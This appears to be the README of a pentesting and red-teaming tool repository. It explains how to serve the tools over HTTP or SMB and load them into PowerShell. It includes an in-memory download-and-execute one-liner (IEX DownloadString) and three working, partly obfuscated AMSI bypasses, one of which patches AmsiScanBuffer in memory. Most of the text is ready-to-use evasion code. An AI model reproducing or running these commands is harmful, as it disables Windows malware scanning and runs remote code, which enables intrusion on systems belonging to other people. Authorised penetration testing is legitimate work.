Collection of Pentesting and Red Teaming Tools..

Usages

Download the tools locally and set up a web or SMB server

1. Clone the repo locally

git clone https://github.com/lefayjey/PentestTools

2. (Optional) Update tools using install script

cd PentestTools
chmod +x install.sh
./install.sh

3. Run HTTP or SMB servers

python3 -m http.server 8000 --directory /opt/PentestTools/

python3 smbserver.py SHARE /opt/PentestTools/ -smb2 -username <user> -password <pass>

4. Load scripts

. .\Offline_WinPwn.ps1

Import-Module \\<Kali_IP>\Offline_WinPwn.ps1

Load scripts into memory directly using the GitHub raw links

https://raw.githubusercontent.com/lefayjey/PentestTools/master/<folder>/<script_binary>

Examples:

IEX ((new-object net.webclient).DownloadString('https://raw.githubusercontent.com/lefayjey/PentestTools/master/windows/Offline_WinPwn.ps1'))

Bypass AMSI

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

or

$i=[Ref].Assembly.GetTypes(); Foreach($j in $i) {if ($j.Name -like "*iUtils") {$k=$j}}; $l=$k.GetFields('No'+'nP'+'ub'+'li'+'c,S'+'ta'+'tic'); Foreach($m in $l) {if ($m.Name -like "*InitFailed") {$n=$m}}; $o=$n.SetValue($null,$true)

or

$vorwicp = @"
using System;
using System.Runtime.InteropServices;
public class vorwicp {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr jkbwtd, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $vorwicp

$owcjrppe = [vorwicp]::LoadLibrary("$([chAR]([bYTe]0x61)+[ChAR](97+12)+[ChAR]([BYTE]0x73)+[Char]([byTe]0x69)+[CHar]([BYtE]0x2e)+[Char](100)+[ChAR]([Byte]0x6c)+[Char](52+56))")
$vrmotzyi = [vorwicp]::GetProcAddress($owcjrppe, "$(('Á'+'ms'+'í'+'Sc'+'àn'+'Buf'+'fe'+'r').nOrMaLIzE([ChAr]([byTe]0x46)+[cHar](111*34/34)+[ChaR](77+37)+[ChAr](109*35/35)+[CHAr](68)) -replace [chAR]([byTe]0x5c)+[Char]([BYte]0x70)+[cHaR](68+55)+[cHAr]([bYtE]0x4d)+[cHar](110*78/78)+[chAr](119+6))")
$p = 0
[vorwicp]::VirtualProtect($vrmotzyi, [uint32]5, 0x40, [ref]$p)
$pekco = "0xC3"
$qiaoc = "0xB8"
$yztep = "0x57"
$oehcpw = "0x07"
$muoep = "0x00"
$owpxj = "0x80"
$lwurip = [Byte[]] ($qiaoc,$yztep,$muoep,$oehcpw,+$owpxj,+$pekco)
[System.Runtime.InteropServices.Marshal]::Copy($lwurip, 0, $vrmotzyi, 6)